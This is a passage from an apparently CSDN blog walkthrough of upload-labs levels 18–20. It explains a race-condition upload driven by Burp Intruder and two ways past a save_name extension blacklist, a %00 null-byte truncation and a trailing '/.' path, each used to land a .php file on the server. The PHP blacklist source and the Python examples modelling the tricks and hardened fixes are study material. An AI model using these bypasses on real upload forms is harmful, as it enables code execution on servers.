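    os.unlink(dest)                         # too late: it was already reachable
    return False, exposed


def hardened_upload(upload_dir, temp_path, file_name, probe):
    """Validate while the file is still in the temp location, then move it
    under a server-chosen name. The user's name never appears in upload_dir,
    so the same concurrent request finds nothing."""
    ext = ext_of(file_name)
    exposed = probe(os.path.join(upload_dir, file_name))   # same moment as above
    if ext not in ALLOW_EXT:
        os.unlink(temp_path)
        return False, exposed
    dest = os.path.join(upload_dir, secrets.token_hex(4) + "." + ext)
    shutil.move(temp_path, dest)
    return True, exposed


def simulate(handler, file_name):
    """Run one upload of a constructed file through `handler` in scratch
    directories; the probe is a plain existence check on the web path."""
    with tempfile.TemporaryDirectory() as tmp, tempfile.TemporaryDirectory() as upload_dir:
        temp_path = os.path.join(tmp, "php" + secrets.token_hex(3))
        with open(temp_path, "wb") as f:
            f.write(b"not an image")         # constructed upload body
        return handler(upload_dir, temp_path, file_name, os.path.exists)
```

The probe is the whole point: in the lab's order a rejected file is observable in the upload directory under its own name until the unlink runs, and that window is what the repeated requests in the steps below aim at; in the hardened order there is no such state to observe.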

Steps:

Step 1: as the code shows, there is no check on the file in the first step, so upload a .php file directly.

Step 2: turn on Burp capture and set a variable so the request can be sent to the server repeatedly.

Send to the Intruder module

Clear the default variables

Mark one position as a variable

Set the number of requests to send to the server continuously

Step 3: click Start attack to start sending requests

Step 4: open another browser, go to the image directory path, append the file name you uploaded, and keep refreshing

Success.

Pass-19 (logic loophole, race condition) secondary rendering

The bypass steps are the same as the previous level

Pass-20

hint:

The file name of this pass is obtained through $_POST.

View source code:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");

        $file_name = $_POST['save_name'];
        $file_ext = pathinfo($file_name,PATHINFO_EXTENSION);

        if(!in_array($file_ext,$deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' .$file_name;
            if (move_uploaded_file($temp_file, $img_path)) { 
                $is_upload = true;
            }else{
                $msg = '上传出错!';
            }
        }else{
            $msg = '禁止保存为该类型文件!';
        }

    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

Code analysis:

if (isset($_POST['submit'])) { was the form submitted?

if (file_exists(UPLOAD_PATH)) { file_exists checks whether the upload/ directory exists

$deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");

the blacklist array

$file_name = $_POST['save_name']; read the save_name value from POST, e.g. save_name=upload-19.jpg

$file_ext = pathinfo($file_name,PATHINFO_EXTENSION); use the pathinfo function

to extract the file extension

if(!in_array($file_ext,$deny_ext)) { check whether the extension is in the blacklist

$temp_file = $_FILES['upload_file']['tmp_name']; if not, the uploaded file is in the temporary directory under its temporary name

$img_path = UPLOAD_PATH . '/' .$file_name; splice UPLOAD_PATH/ and $file_name into the new path

if (move_uploaded_file($temp_file, $img_path)) { move the temporary file from the temporary directory to the new path.

Bypass ideas:

The first kind (%00 truncation): from the source code, the uploaded file itself is not filtered; what is filtered is $_POST['save_name'], e.g. save_name=upload-19.jpg, and the final save path is also

determined by $_POST['save_name']. So we only need to get the final save_name past the check.

Steps:

Step 1: since the uploaded file itself is not checked or filtered, upload a .php file directly.

Step 2: open Burp, modify the request, and truncate the value of save_name with %00.

(The reason it is not simply changed to .php is that the source uses pathinfo to check the suffix; a plain .php would fail the check. So .jpg must follow .php%00: the suffix check sees jpg and passes. When the file is finally moved, move_uploaded_file stops at the %00 in the directory/file name, so moving upload-19.php%00.jpg saves the file on the server as upload-19.php.)

Note!! This %00 is passed via POST, so remember to convert it (URL-decode it)!!

Step 3: forward the packet

Step 4: access the file

Success

The second bypass (folder-name spoofing)

Since we know that save_name is what gets verified,
and its value is save_name = upload-19.jpg,
the path is spliced as
UPLOAD_PATH . '/' .$file_name;
upload/upload-19.jpg
so we use
upload/upload-19.php/. to bypass it.
At verification time the suffix is computed from php/.: because of the appended /., pathinfo no longer sees php as the extension, so the blacklist does not match and
the check is bypassed. When the file is finally saved, the original upload/upload-19.php/.
is forcibly saved as upload/upload-19.php, which is a php file.

 success
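As an added example (not part of the tutorial and not upload-labs code), the Python below models how the controllable path of Pass-12/13 and the save_name of Pass-20 reach the filesystem: a NUL byte ends the string for the C layer beneath PHP's file functions, and a trailing /. is collapsed when the path is resolved. It also shows a path builder that refuses both, and a self-check that Python 3 itself rejects NUL in paths. UPLOAD_ROOT is a hypothetical directory and the PHP behaviour is re-modelled here, not called.

```python
"""Path construction for the stored upload (Pass-12/13 and Pass-20) beside
a builder that refuses the tricks. Added example, not the lab's code;
UPLOAD_ROOT is hypothetical."""
import posixpath

UPLOAD_ROOT = "/var/www/app/upload"      # hypothetical upload directory
ALLOW_EXT = {"jpg", "png", "gif"}


def php_pathinfo_extension(name):
    """Model of pathinfo($name, PATHINFO_EXTENSION): take the last path
    component, then whatever follows its last dot ('' if there is none)."""
    base = name.rstrip("/").rsplit("/", 1)[-1]
    dot = base.rfind(".")
    return base[dot + 1:] if dot >= 0 else ""


def c_string_view(path):
    """What a C string API (the layer under move_uploaded_file in old PHP)
    sees: everything after the first NUL byte is gone."""
    return path.split("\x00", 1)[0]


def lab_effective_path(raw_path):
    """Where the lab's spliced path ends up once the C layer truncates at
    NUL and the filesystem collapses '/.' segments."""
    return posixpath.normpath(c_string_view(raw_path))


def rejects_embedded_nul(path):
    """Python 3 refuses NUL in paths outright; quick self-check of that."""
    try:
        open(path, "rb").close()
    except ValueError:            # "embedded null byte"
        return True
    except OSError:
        return False
    return False


def safe_save_path(user_name):
    """Build the destination without trusting the name: no NUL, no path
    separators, no leading dot, exactly one dot, extension taken from the
    normalised final path, and the result must sit directly in UPLOAD_ROOT.
    Returns the path or None."""
    if "\x00" in user_name or "/" in user_name or "\\" in user_name:
        return None
    candidate = posixpath.normpath(posixpath.join(UPLOAD_ROOT, user_name))
    if posixpath.dirname(candidate) != UPLOAD_ROOT:
        return None
    base = posixpath.basename(candidate)
    ext = php_pathinfo_extension(base).lower()
    if base.startswith(".") or base.count(".") != 1 or ext not in ALLOW_EXT:
        return None
    return candidate
```

The extension is checked on the path the filesystem will actually use, after normalisation, which is the difference between this builder and the lab's pathinfo-on-raw-input check; as in the earlier levels, a server should still replace the user's name with one it generates.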


Origin blog.csdn.net/m0_72755466/article/details/128499580